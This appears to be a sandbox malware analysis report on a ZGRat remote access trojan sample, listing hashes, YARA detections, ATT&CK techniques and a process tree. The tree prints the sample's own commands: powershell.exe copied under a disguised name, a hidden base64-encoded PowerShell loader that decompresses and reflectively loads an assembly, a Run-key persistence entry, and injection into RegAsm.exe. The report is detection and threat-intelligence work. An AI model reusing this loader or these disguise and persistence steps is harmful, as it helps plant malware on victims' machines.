zgrat | 0da37f4dc45bda166d0ad59523a097be39f5a3d774aa843620e204f7995ff2c1

Analysis

max time kernel
30s
max time network
33s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
09-05-2024 17:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ad6141820386639133953308360445558077741366324631087357035.cmd
Size

3.2MB
MD5

305eaa031146e25cc809f31c4c980ab2
SHA1

2ee88870d62960197e7aa14e7c774228bcc82c23
SHA256

795932d040c08e9122325bcbfb4a428398ec38d7b3937e0e6154c8d40d66c724
SHA512

11eafabbb51568b1bbf5a406727d739b138825120e9cd70555ec5698018fc9161463909ab74016a0a40f36ab36e7e449b4865ab9ae955962601eaa7ea16e82d4
SSDEEP

49152:R8gtQOH/aTIdOlKf1DNBI874MEikGexHFrqa3:Y

Score

10^/10

zgrat persistence rat

Malware Config

Signatures

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral1/memory/2728-35-0x00000000086D0000-0x000000000892C000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-52-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-48-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-47-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-38-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-62-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-64-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-88-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-92-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-100-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-98-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-96-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-94-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-90-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-84-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-82-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-86-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-80-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-78-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-74-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-72-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-70-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-68-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-66-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-58-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-76-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-56-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-60-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-54-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-50-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-44-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-42-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-40-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1
behavioral1/memory/2728-37-0x00000000086D0000-0x0000000008925000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Executes dropped EXE 1 IoCs

pid	Process
2728	Onqjmpte.Ghj

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cleer = "C:\\Users\\Admin\\AppData\\Roaming\\Cleer.cmd"	Onqjmpte.Ghj

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2728 set thread context of 4516	2728	Onqjmpte.Ghj	113

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2728	Onqjmpte.Ghj
2728	Onqjmpte.Ghj
2728	Onqjmpte.Ghj
2728	Onqjmpte.Ghj
2728	Onqjmpte.Ghj
2728	Onqjmpte.Ghj
2728	Onqjmpte.Ghj
2728	Onqjmpte.Ghj
2728	Onqjmpte.Ghj
2728	Onqjmpte.Ghj

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2728	Onqjmpte.Ghj
Token: SeDebugPrivilege	2728	Onqjmpte.Ghj

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4516	RegAsm.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 1984 wrote to memory of 468	1984	cmd.exe	83
PID 1984 wrote to memory of 468	1984	cmd.exe	83
PID 1984 wrote to memory of 4240	1984	cmd.exe	84
PID 1984 wrote to memory of 4240	1984	cmd.exe	84
PID 1984 wrote to memory of 2448	1984	cmd.exe	85
PID 1984 wrote to memory of 2448	1984	cmd.exe	85
PID 2448 wrote to memory of 3272	2448	cmd.exe	87
PID 2448 wrote to memory of 3272	2448	cmd.exe	87
PID 2448 wrote to memory of 2392	2448	cmd.exe	88
PID 2448 wrote to memory of 2392	2448	cmd.exe	88
PID 2448 wrote to memory of 3316	2448	cmd.exe	89
PID 2448 wrote to memory of 3316	2448	cmd.exe	89
PID 2448 wrote to memory of 1232	2448	cmd.exe	90
PID 2448 wrote to memory of 1232	2448	cmd.exe	90
PID 2448 wrote to memory of 2728	2448	cmd.exe	92
PID 2448 wrote to memory of 2728	2448	cmd.exe	92
PID 2448 wrote to memory of 2728	2448	cmd.exe	92
PID 2728 wrote to memory of 760	2728	Onqjmpte.Ghj	105
PID 2728 wrote to memory of 760	2728	Onqjmpte.Ghj	105
PID 2728 wrote to memory of 760	2728	Onqjmpte.Ghj	105
PID 2728 wrote to memory of 2140	2728	Onqjmpte.Ghj	111
PID 2728 wrote to memory of 2140	2728	Onqjmpte.Ghj	111
PID 2728 wrote to memory of 2140	2728	Onqjmpte.Ghj	111
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113
PID 2728 wrote to memory of 4516	2728	Onqjmpte.Ghj	113

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ad6141820386639133953308360445558077741366324631087357035.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo F "
  2⤵
  PID:468
- C:\Windows\system32\xcopy.exe
  xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Onqjmpte.Ghj
  2⤵
  PID:4240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ad6141820386639133953308360445558077741366324631087357035.cmd"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo F "
    3⤵
    PID:3272
- - C:\Windows\system32\xcopy.exe
    xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Onqjmpte.Ghj
    3⤵
    PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo F "
    3⤵
    PID:3316
- - C:\Windows\system32\xcopy.exe
    xcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\ad6141820386639133953308360445558077741366324631087357035.cmd C:\Users\Admin\AppData\Local\Temp\Onqjmpte.Ghj.cmd
    3⤵
    PID:1232
- - C:\Users\Admin\AppData\Local\Temp\Onqjmpte.Ghj
    C:\Users\Admin\AppData\Local\Temp\Onqjmpte.Ghj -WindowStyle hidden -enc JABSAHQAYwB0AHYAbwB4AGsAeQBuACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACgAKABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQApACAAKwAgACIALgBjAG0AZAAiACkAIAB8ACAAcwBlAGwAZQBjAHQALQBvAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQASQBlAG4AeQB2AGsAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABSAHQAYwB0AHYAbwB4AGsAeQBuACkAOwAkAEwAcQByAHcAdgB3AHYAaQBsACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABJAGUAbgB5AHYAawBtACAAKQA7ACQAQgBsAGYAcABuAHkAZgB0AGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFEAcgBxAGoAdQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABMAHEAcgB3AHYAdwB2AGkAbAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUQByAHEAagB1AC4AQwBvAHAAeQBUAG8AKAAgACQAQgBsAGYAcABuAHkAZgB0AGEAIAApADsAJABRAHIAcQBqAHUALgBDAGwAbwBzAGUAKAApADsAJABMAHEAcgB3AHYAdwB2AGkAbAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEkAZQBuAHkAdgBrAG0AIAA9ACAAJABCAGwAZgBwAG4AeQBmAHQAYQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQASQBlAG4AeQB2AGsAbQApADsAIAAkAEkAbABqAGEAcwB5AHcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBlAG4AeQB2AGsAbQApADsAIAAkAFUAdQB3AGkAcABiACAAPQAgACQASQBsAGoAYQBzAHkAdwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:760
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2140
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Onqjmpte.Ghj

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Onqjmpte.Ghj.cmd

Filesize
3.2MB

MD5
305eaa031146e25cc809f31c4c980ab2

SHA1
2ee88870d62960197e7aa14e7c774228bcc82c23

SHA256
795932d040c08e9122325bcbfb4a428398ec38d7b3937e0e6154c8d40d66c724

SHA512
11eafabbb51568b1bbf5a406727d739b138825120e9cd70555ec5698018fc9161463909ab74016a0a40f36ab36e7e449b4865ab9ae955962601eaa7ea16e82d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_23x3lfqw.buo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2728-8-0x000000007495E000-0x000000007495F000-memory.dmp

Filesize
4KB

Download
memory/2728-9-0x00000000052D0000-0x0000000005306000-memory.dmp

Filesize
216KB

Download
memory/2728-10-0x0000000074950000-0x0000000075100000-memory.dmp

Filesize
7.7MB

Download
memory/2728-11-0x0000000005940000-0x0000000005F68000-memory.dmp

Filesize
6.2MB

Download
memory/2728-12-0x0000000074950000-0x0000000075100000-memory.dmp

Filesize
7.7MB

Download
memory/2728-13-0x0000000005FE0000-0x0000000006002000-memory.dmp

Filesize
136KB

Download
memory/2728-15-0x00000000061F0000-0x0000000006256000-memory.dmp

Filesize
408KB

Download
memory/2728-14-0x0000000006080000-0x00000000060E6000-memory.dmp

Filesize
408KB

Download
memory/2728-25-0x0000000006260000-0x00000000065B4000-memory.dmp

Filesize
3.3MB

Download
memory/2728-26-0x0000000006780000-0x000000000679E000-memory.dmp

Filesize
120KB

Download
memory/2728-27-0x00000000067C0000-0x000000000680C000-memory.dmp

Filesize
304KB

Download
memory/2728-28-0x0000000007770000-0x0000000007806000-memory.dmp

Filesize
600KB

Download
memory/2728-29-0x0000000006C80000-0x0000000006C9A000-memory.dmp

Filesize
104KB

Download
memory/2728-30-0x0000000006CD0000-0x0000000006CF2000-memory.dmp

Filesize
136KB

Download
memory/2728-31-0x0000000008120000-0x00000000086C4000-memory.dmp

Filesize
5.6MB

Download
memory/2728-32-0x0000000008D50000-0x00000000093CA000-memory.dmp

Filesize
6.5MB

Download
memory/2728-34-0x0000000007B70000-0x0000000007DF2000-memory.dmp

Filesize
2.5MB

Download
memory/2728-35-0x00000000086D0000-0x000000000892C000-memory.dmp

Filesize
2.4MB

Download
memory/2728-36-0x0000000007F90000-0x0000000008022000-memory.dmp

Filesize
584KB

Download
memory/2728-52-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-48-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-47-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-38-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-62-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-64-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-88-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-92-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-100-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-98-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-96-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-94-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-90-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-84-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-82-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-86-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-80-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-78-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-74-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-72-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-70-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-68-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-66-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-58-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-76-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-56-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-60-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-54-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-50-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-44-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-42-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-40-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-37-0x00000000086D0000-0x0000000008925000-memory.dmp

Filesize
2.3MB

Download
memory/2728-4898-0x0000000074950000-0x0000000075100000-memory.dmp

Filesize
7.7MB

Download
memory/2728-4900-0x00000000080B0000-0x00000000080FC000-memory.dmp

Filesize
304KB

Download
memory/2728-4899-0x0000000008930000-0x00000000089CA000-memory.dmp

Filesize
616KB

Download
memory/2728-4901-0x00000000089D0000-0x0000000008A24000-memory.dmp

Filesize
336KB

Download